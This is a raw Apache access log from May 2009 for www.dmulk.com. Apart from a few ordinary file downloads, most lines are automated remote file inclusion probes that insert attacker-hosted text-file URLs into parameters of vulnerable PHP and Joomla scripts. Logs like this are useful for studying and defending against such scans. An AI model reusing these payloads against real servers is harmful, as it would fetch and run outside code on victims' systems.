128.2.204.134 - - [19/May/2009:09:53:49 -0700] "GET / HTTP/1.1" 200 41997 "-" "PrivacyFinder/1.1" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:53:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:53:57 -0700] "GET /logs/access_081010.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:53:57 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:53:57 -0700] "GET /logs/access_080901.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:53:57 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:53:59 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:53:59 -0700] "GET /logs/access_080901.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:53:59 -0700] "GET /logs/access_081010.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:53:59 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:54:08 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:54:12 -0700] "GET /logs/access_070724.log//index.php?lang=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:54:18 -0700] "GET /logs//index.php?lang=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:54:25 -0700] "GET /logs/access_081010.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:54:25 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:54:30 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:54:30 -0700] "GET /logs/access_081010.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:54:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:54:33 -0700] "GET /index.php?lang=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 41948 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:54:46 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:55:06 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:55:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:55:07 -0700] "GET /logs/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:55:07 -0700] "GET /errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:55:08 -0700] "GET /logs/access_080804.log/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:55:09 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:55:12 -0700] "GET /index.php?lang=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 200 41948 "-" "libwww-perl/5.805" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:55:13 -0700] "GET /errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:55:13 -0700] "GET /logs/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:55:14 -0700] "GET /logs/access_080804.log%20%20/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:55:14 -0700] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:55:15 -0700] "GET /logs/access_080329.log/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:55:29 -0700] "GET /logs/access_080329.log%20%20/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:55:36 -0700] "GET /logs/access_081224.log//index.php?lang=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.87.219 - - [19/May/2009:09:55:45 -0700] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.laubrotel.com/cgi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
211.206.122.138 - - [19/May/2009:09:56:03 -0700] "GET /logs/access_071228.log//cjaycontent/admin/editor2/spaw_control.class1.php?spaw_root=http://www.guiafem.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.122.138 - - [19/May/2009:09:56:04 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class1.php?spaw_root=http://www.guiafem.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.122.138 - - [19/May/2009:09:56:04 -0700] "GET /logs//cjaycontent/admin/editor2/spaw_control.class1.php?spaw_root=http://www.guiafem.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:05 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:05 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:05 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:09:56:17 -0700] "GET /logs/access_080925.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:56:20 -0700] "GET /logs/access_081224.log//index.php?lang=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:56:24 -0700] "GET /errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:56:24 -0700] "GET /logs/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:56:24 -0700] "GET /logs/access_080804.log/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:09:56:24 -0700] "GET /logs/access_080329.log/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:27 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:27 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:27 -0700] "GET /logs/access_080412.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:27 -0700] "GET /logs/access_080513.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:56:28 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:56:28 -0700] "GET /logs//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:56:29 -0700] "GET /guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:32 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:56:33 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:56:33 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:56:33 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:56:38 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:38 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:38 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:38 -0700] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:56:38 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.28.103.46 - - [19/May/2009:09:56:43 -0700] "GET /logs/access_080222.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:56:46 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:56:50 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:56:50 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:56:50 -0700] "GET /logs/access_080412.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.28.103.46 - - [19/May/2009:09:56:50 -0700] "GET /logs/access_080925.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:56:50 -0700] "GET /logs/access_080513.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.25.197.12 - - [19/May/2009:09:57:06 -0700] "GET /logs//osticket/include/main.php?config[search_disp]=true&include_dir=http://billiardshow.de/components/com_content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.25.197.12 - - [19/May/2009:09:57:06 -0700] "GET /logs/access_080902.log//osticket/include/main.php?config[search_disp]=true&include_dir=http://billiardshow.de/components/com_content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.25.197.12 - - [19/May/2009:09:57:06 -0700] "GET /osticket/include/main.php?config[search_disp]=true&include_dir=http://billiardshow.de/components/com_content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:57:21 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:57:21 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:57:23 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:57:26 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:57:26 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:57:26 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:57:26 -0700] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:57:27 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:57:33 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.182.137.218 - - [19/May/2009:09:57:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://inbus.cn/home/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
207.182.137.218 - - [19/May/2009:09:57:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://inbus.cn/home/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
207.182.137.218 - - [19/May/2009:09:57:34 -0700] "GET /logs/access_080622.log/modules/My_eGallery/index.php?basepath=http://inbus.cn/home/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:57:35 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:57:37 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:57:37 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.182.137.218 - - [19/May/2009:09:57:40 -0700] "GET /logs/access_080519.log/modules/My_eGallery/index.php?basepath=http://inbus.cn/home/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
211.206.122.138 - - [19/May/2009:09:57:44 -0700] "GET /logs/access_071212.log//cjaycontent/admin/editor2/spaw_control.class1.php?spaw_root=http://www.guiafem.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:57:49 -0700] "GET /logs//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:57:50 -0700] "GET /logs/access_090315.log%20%20//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:57:50 -0700] "GET /guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.50 - - [19/May/2009:09:57:52 -0700] "GET /logs/access_080821.log%20%20//?custompluginfile[]=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.50 - - [19/May/2009:09:57:52 -0700] "GET /logs//?custompluginfile[]=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 200 100196 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.50 - - [19/May/2009:09:57:57 -0700] "GET /logs/access_080515.log%20%20//?custompluginfile[]=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:58:05 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:58:05 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:58:05 -0700] "GET /logs/access_080412.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:58:06 -0700] "GET /logs/access_080513.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:58:08 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:58:20 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:58:20 -0700] "GET /logs//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:58:20 -0700] "GET /guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:58:23 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:58:26 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:58:47 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:58:47 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:58:47 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:58:47 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:58:54 -0700] "GET /logs/access_081212.log/index2.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:58:54 -0700] "GET /logs/access_080424.log/index2.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.50 - - [19/May/2009:09:58:54 -0700] "GET /?custompluginfile[]=http://peek-a-moo.com/css/1.txt?? HTTP/1.1" 200 42069 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:58:54 -0700] "GET /logs/index2.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:58:54 -0700] "GET /index2.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:59:15 -0700] "GET /logs/access_080313.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:59:25 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:59:26 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:59:33 -0700] "GET /logs/access_081212.log%20%20/index2.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:59:36 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:59:36 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:59:36 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:09:59:37 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.206.122.138 - - [19/May/2009:09:59:48 -0700] "GET /logs/access_080330.log/config.php?path[docroot]=http://www.guiafem.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.122.138 - - [19/May/2009:09:59:48 -0700] "GET /config.php?path[docroot]=http://www.guiafem.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.122.138 - - [19/May/2009:09:59:48 -0700] "GET /logs/config.php?path[docroot]=http://www.guiafem.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:59:55 -0700] "GET /logs/access_080424.log%20%20/index2.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
